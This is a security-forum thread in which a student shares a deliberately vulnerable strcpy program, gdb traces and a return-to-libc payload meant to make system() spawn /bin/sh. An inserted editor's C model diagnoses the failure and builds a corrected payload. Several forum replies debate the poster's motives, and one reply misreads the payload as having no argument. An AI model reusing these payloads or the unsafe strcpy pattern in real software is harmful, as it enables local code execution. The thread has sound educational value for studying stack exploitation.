Problem with simple return-to-libc exploit.

Thread: Problem with simple return-to-libc exploit.

  1. #1
    Junior Member Haggis's Avatar
    Join Date
    Jul 2007
    Posts
    5

    Problem with simple return-to-libc exploit.

    I'm experimenting with some basic exploits and need some help.

    Here is the standard issue code - exploit.c :
    Code:
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buffer[5];
        //buffer[0] = 1;
        //buffer[5] = 0;

        strcpy(buffer, argv[1]);

        return 0;
    }
    It will be obvious what I'm trying to do, but I'll explain anyway.

    I want to craft a buffer and feed it to ./exploit so that the call to strcpy() will overwrite the stack frame belonging to main, and execution can be redirected to the system() call in libc.

    Here are the steps I have taken.

    I want system() to spawn me a shell so I need to pass it the argument "/bin/sh", which I've stored in an environment variable:
    $>export BINSH="/bin/sh"
    And I've written a simple program to return the address of the variable in memory using the getenv() function:
    $ ./getenv BINSH
    BINSH @ 0xbffffc86
    To find the address of system() I've used gdb:
    Note that address space randomization has been turned off.
    $ gdb -q exploit
    Using host libthread_db library "/lib/libthread_db.so.1".
    (gdb) run aaaa
    Starting program: ........../exploit aaaa

    Program exited normally.
    (gdb) p system
    $1 = {<text variable, no debug info>} 0xb7ede030 <system>
    (gdb) quit
    To find out how much garbage to put at the start of the buffer I looked at the output from gcc - exploit.s :
    Code:
    .file	"exploit.c"
    	.text
    .globl main
    	.type	main, @function
    main:
    	leal	4(%esp), %ecx
    	andl	$-16, %esp
    	pushl  -4(%ecx)
    	pushl  %ebp
    	movl	%esp, %ebp
    	pushl  %ecx
    	subl	$36, %esp
    	movl	4(%ecx), %eax
    	addl	$4, %eax
    	movl	(%eax), %eax
    	movl	%eax, 4(%esp)
    	leal	-9(%ebp), %eax
    	movl	%eax, (%esp)
    	call	strcpy
    	movl	$0, %eax
    	addl	$36, %esp
    	popl	%ecx
    	popl	%ebp
    	leal	-4(%ecx), %esp
    	ret
    	.size	main, .-main
    	.ident	"GCC: (GNU) 4.1.2 (Gentoo 4.1.2)"
    	.section	.note.GNU-stack,"",@progbits
    It looks as though buffer[0] is located 9 bytes from the saved frame pointer. I execute the exploit code with a crafted buffer as follows:

    $ ./exploit `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
    Segmentation fault
    ......nothing. No new shell.
    This is despite the fact that I know EIP is getting overwritten. According to gdb:

    $ gdb -q exploit
    Using host libthread_db library "/lib/libthread_db.so.1".
    (gdb) disassemble main
    Dump of assembler code for function main:
    0x08048374 <main+0>: lea 0x4(%esp),%ecx
    0x08048378 <main+4>: and $0xfffffff0,%esp
    0x0804837b <main+7>: pushl 0xfffffffc(%ecx)
    0x0804837e <main+10>: push %ebp
    0x0804837f <main+11>: mov %esp,%ebp
    0x08048381 <main+13>: push %ecx
    0x08048382 <main+14>: sub $0x24,%esp
    0x08048385 <main+17>: mov 0x4(%ecx),%eax
    0x08048388 <main+20>: add $0x4,%eax
    0x0804838b <main+23>: mov (%eax),%eax
    0x0804838d <main+25>: mov %eax,0x4(%esp)
    0x08048391 <main+29>: lea 0xfffffff7(%ebp),%eax
    0x08048394 <main+32>: mov %eax,(%esp)
    0x08048397 <main+35>: call 0x80482c0 <strcpy@plt>
    0x0804839c <main+40>: mov $0x0,%eax
    0x080483a1 <main+45>: add $0x24,%esp
    0x080483a4 <main+48>: pop %ecx
    0x080483a5 <main+49>: pop %ebp
    0x080483a6 <main+50>: lea 0xfffffffc(%ecx),%esp
    0x080483a9 <main+53>: ret
    End of assembler dump.
    (gdb) break *0x0804839c
    Breakpoint 1 at 0x804839c
    (gdb) run `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
    Starting program: ........./exploit `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`

    Breakpoint 1, 0x0804839c in main ()
    (gdb) info frame
    Stack level 0, frame at 0xbffff230:
    eip = 0x804839c in main; saved eip 0xb7ede030
    Arglist at 0xbffff228, args:
    Locals at 0xbffff228, Previous frame's sp is 0xfffffdb9
    Saved registers:
    ecx at 0xbffff224, ebp at 0xbffff228, eip at 0xbffff22c
    (gdb)

    So what am I doing wrong? Have I crafted the stack frame incorrectly? What am I missing?

    Are you still reading?

    Any insight or pointers in the right direction are greatly appreciated.

    Here is some more information about my system that might be useful.

    $ uname -a
    Linux localhost 2.6.20-gentoo-r8 #1 Wed Jul 11 01:17:44 GMT 2007 i686 Mobile AMD Sempron(tm) Processor 3400+ AuthenticAMD GNU/Linux

    $ gcc --version
    gcc (GCC) 4.1.2 (Gentoo 4.1.2)
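Added editor's example (not part of the original thread and not the poster's code): a C model of main()'s frame built from the prologue and epilogue quoted in the post above. It puts the posted payload through strcpy and then through `pop %ecx; pop %ebp; lea -4(%ecx),%esp; ret` and reports where ret would pop its target from. The epilogue rebuilds %esp from the saved %ecx, so the dword that lands at %ebp-4 decides what ret reads; the dword at %ebp+4 is only the copy pushed by `pushl -4(%ecx)`, which is what gdb's "saved eip" heuristic shows. The addresses are the ones quoted in the post (ebp at 0xbffff228, system at 0xb7ede030, the BINSH string at 0xbffffc86, ASLR off); the 32-byte window and the second, "pivoted" payload are the example's own construction. The second payload only changes the dword in the saved-%ecx slot so that the rebuilt %esp points at the system() dword. The model says nothing about whether 0xbffffc86 still points at "/bin/sh" in the exploited process (environment addresses shift with the program name and arguments), and it has not been run against the real binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Model of main()'s frame as laid out by the posted prologue/epilogue
 * (32-bit, GCC 4.1.2 with stack realignment):
 *
 *   buffer[0]            at %ebp-9   (lea -9(%ebp),%eax before call strcpy)
 *   saved %ecx           at %ebp-4   (push %ecx after mov %esp,%ebp)
 *   saved %ebp           at %ebp+0
 *   copy of return addr  at %ebp+4   (pushl -4(%ecx) in the prologue)
 *
 *   epilogue: pop %ecx ; pop %ebp ; lea -4(%ecx),%esp ; ret
 *
 * The epilogue rebuilds %esp from the saved %ecx, so the dword at %ebp-4
 * decides where ret pops its target.  The dword at %ebp+4 is a copy: gdb's
 * "saved eip" heuristic reads it, ret does not.
 */
#define EBP_ADDR    0xbffff228u        /* "ebp at 0xbffff228" in the gdb output */
#define BUF_ADDR    (EBP_ADDR - 9u)    /* address of buffer[0] */
#define FRAME_LEN   32u                /* bytes modelled from buffer[0] upward (assumption) */
#define SYSTEM_ADDR 0xb7ede030u        /* "p system" in the post */
#define BINSH_ADDR  0xbffffc86u        /* ./getenv BINSH in the post */
#define JUNK_RET    0x41414141u        /* "AAAA": where system() would return to */

struct ret_model {
    size_t   copied;       /* bytes strcpy copied before its NUL */
    uint32_t ecx;          /* value popped into %ecx */
    uint32_t esp_at_ret;   /* %esp when ret executes (= %ecx - 4) */
    int      in_frame;     /* 1 if ret and system()'s argument read inside the modelled frame */
    uint32_t ret_target;   /* dword ret pops (only meaningful if in_frame) */
    uint32_t sys_arg;      /* dword at [%esp+4] after ret: system()'s argument */
    uint32_t copy_at_ebp4; /* what gdb reports as "saved eip" */
};

static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Little-endian dword at absolute stack address `addr`; clears *ok if outside the model. */
static uint32_t rd32_at(const uint8_t *frame, uint32_t addr, int *ok) {
    if (addr < BUF_ADDR || addr + 4 > BUF_ADDR + FRAME_LEN) { *ok = 0; return 0; }
    const uint8_t *p = frame + (addr - BUF_ADDR);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Simulate strcpy(buffer, payload) followed by main's epilogue. */
struct ret_model run_epilogue(const uint8_t *payload, size_t len) {
    uint8_t frame[FRAME_LEN] = {0};
    struct ret_model r = {0};
    int ok = 1;

    /* strcpy stops at the first NUL; the model also stays inside its window. */
    while (r.copied < len && r.copied < FRAME_LEN - 1 && payload[r.copied] != 0) {
        frame[r.copied] = payload[r.copied];
        r.copied++;
    }
    r.copy_at_ebp4 = rd32_at(frame, EBP_ADDR + 4, &ok);
    r.ecx          = rd32_at(frame, EBP_ADDR - 4, &ok);             /* pop %ecx */
    r.esp_at_ret   = r.ecx - 4;                                      /* lea -4(%ecx),%esp */
    r.in_frame     = 1;
    r.ret_target   = rd32_at(frame, r.esp_at_ret, &r.in_frame);     /* ret */
    r.sys_arg      = rd32_at(frame, r.esp_at_ret + 8, &r.in_frame); /* [%esp+4] inside system() */
    return r;
}

/* Payload from the original post: 13 x 'A', system, "AAAA", &"/bin/sh". */
size_t build_posted_payload(uint8_t *out) {
    memset(out, 'A', 13);
    wr32(out + 13, SYSTEM_ADDR);
    wr32(out + 17, JUNK_RET);
    wr32(out + 21, BINSH_ADDR);
    return 25;
}

/* Same dwords, but the saved-%ecx slot (payload offset 5) is set 4 past the
 * system() dword, so lea -4(%ecx),%esp lands ret on it.  Example construction. */
size_t build_pivoted_payload(uint8_t *out) {
    size_t n = build_posted_payload(out);
    wr32(out + 5, BUF_ADDR + 13 + 4);
    return n;
}

struct ret_model model_posted(void)  { uint8_t p[32]; return run_epilogue(p, build_posted_payload(p)); }
struct ret_model model_pivoted(void) { uint8_t p[32]; return run_epilogue(p, build_pivoted_payload(p)); }

static void report(const char *name, struct ret_model r) {
    printf("%s: strcpy copied %zu bytes, ecx=0x%08x, esp at ret=0x%08x, gdb 'saved eip'=0x%08x\n",
           name, r.copied, r.ecx, r.esp_at_ret, r.copy_at_ebp4);
    if (r.in_frame)
        printf("  ret pops 0x%08x, system() would read its argument 0x%08x\n", r.ret_target, r.sys_arg);
    else
        printf("  ret pops from outside the frame -> segmentation fault\n");
}

int main(void) {
    report("posted payload ", model_posted());
    report("pivoted payload", model_pivoted());
    return 0;
}
```

Build with `gcc -std=c99 -Wall -o frame_model frame_model.c` on any host; it does not need a 32-bit toolchain because it only models the frame. For the posted payload the saved-%ecx slot receives "AAAA", the epilogue sets %esp to 0x4141413d and ret faults, while %ebp+4 holds the system() address that gdb reported as "saved eip"; for the pivoted payload the model has ret popping system() with 0xbffffc86 at [%esp+4].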

  2. #2
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,191
    My dear "Prince of the pudding race" (Rabbie Burns) I have allowed this post, on the grounds that we are a security site.

    Sorry that I am not technically competent to answer your question

    cheers

  3. #3
    Senior Member WolfeTone's Avatar
    Join Date
    Jun 2007
    Location
    Ireland
    Posts
    197
    Before I answer or attempt to, can I ask from what viewpoint you are interested in exploits, to use them to gain system access or understand them to prevent?

  4. #4
    Junior Member Haggis's Avatar
    Join Date
    Jul 2007
    Posts
    5
    Do you care?

    I have no desire to learn, from you or anyone else here, how to break into peoples computers; Nor to understand exploits with a view to preventing them (as I never write code that appears in the public domain). I simply wish to understand these techniques.

    No-one is going to gain root access with this exploit anyway (as system() drops privileges).

    So please don't give me your rite-of-passage question-and-answer-session bull***t. If you think I'm some nasty wannabe hacker (or whatever) who is going to try to do lots of nasty stuff, then simply don't post anything. I'll learn the techniques myself eventually, I just wondered if there might be any support out there, or anyone who shared an interest and wanted to engage in some intelligent discussion.

    But please, don't post crap like that.

  5. #5
    Senior Member WolfeTone's Avatar
    Join Date
    Jun 2007
    Location
    Ireland
    Posts
    197
    Quote Originally Posted by Haggis
    Do you care?
    Wouldn't have asked if I didn't!

    Quote Originally Posted by Haggis
    But please, don't post crap like that.
    No prob, I won't.

  6. #6
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,191
    Do you care?
    Yes, strange though it might seem, we actually do..........

    Believe it or not, we get so many "how do I hack my girlfriend's Hotmail account" or online Viagra adverts and all that crap..............

    I made a personal decision that you were a genuine guy who would contribute to our forums........... please don't prove me wrong, and do lose the chip on your shoulder.

    I have no desire to learn, from you or anyone else here
    Why did you join then?

    If you cannot code, perhaps you should consider a career in selling icecream?

    If you have no intellectual humility perhaps you should go elsewhere?

    Up to you my "prince of the pudding race"

  7. #7
    Senior Member WolfeTone's Avatar
    Join Date
    Jun 2007
    Location
    Ireland
    Posts
    197
    Quote Originally Posted by nihil
    do lose the chip on your shoulder.
    Agreed!
    You'll find people more willing to help then.
    And from what I've seen - there are def people who can!

    If you cannot code, perhaps you should consider a career in selling icecream?
    Ha.

    But I do agree with nihil - you seem to be genuinely interested, so an adjustment in attitude would really help.

  8. #8
    Senior Member WolfeTone's Avatar
    Join Date
    Jun 2007
    Location
    Ireland
    Posts
    197
    I found the link below an interesting read, might help you.

    [Edit] Link removed as I don't like posting in public forums. Check your PM.[/Edit]

    Provided as a gesture of good faith!

  9. #9
    Junior Member Haggis's Avatar
    Join Date
    Jul 2007
    Posts
    5
    I do beg your pardon, I may have been a bit quick off the mark. There was no need to respond like that and I apologize - if not for causing offence, then certainly for bringing down the intelligence of the forum.

    Please do not quote me out of context; I'm sure you're well aware of the point I was making. I have no desire to "Hack my Girlfriend's Hotmail" (incidentally, we have quite a good relationship, and I am granted free access to her account for my own use).

    I am genuine. A student from Glasgow, studying a mixture of electronics and computer science. I have been programming for some time and have recently become interested in how programs are exploited, in particular how execution can be controlled and redirected. I have come across a stumbling block however and required some help understanding. I thought this would be a good thread for people who are in the same position but didn't know who to ask, as I am aware the resources for this type of exploit go out of date quite quickly.

    This is advertised as a "Security" forum with a section in particular on "Programming Security". I would have thought the bulk of the discussion here would centre upon buffer overflows, format string exploits etc., which doesn't seem to be the case. Hence I have started a thread where hopefully people with enough intelligence will be able to follow a very basic (and relatively un-dangerous) exploit from start to finish. To that end then, I invite anyone with the knowledge and desire to please contribute.

    Thank you for the link WolfeTone. I have not yet looked at it but certainly will!

  10. #10
    Elite Hacker
    Join Date
    Mar 2003
    Posts
    1,407
    You don't have any shellcode or anything. You're just calling system() with no arguments. It needs a command to execute. You need to get the address of a string with the command you want on the stack before you call it. I've never seen anyone do it that way though. I've only seen people put the actual machine code to exec a shell in memory and have it return to that. I'm sure the link provided to you will give you a good understanding. Good luck.
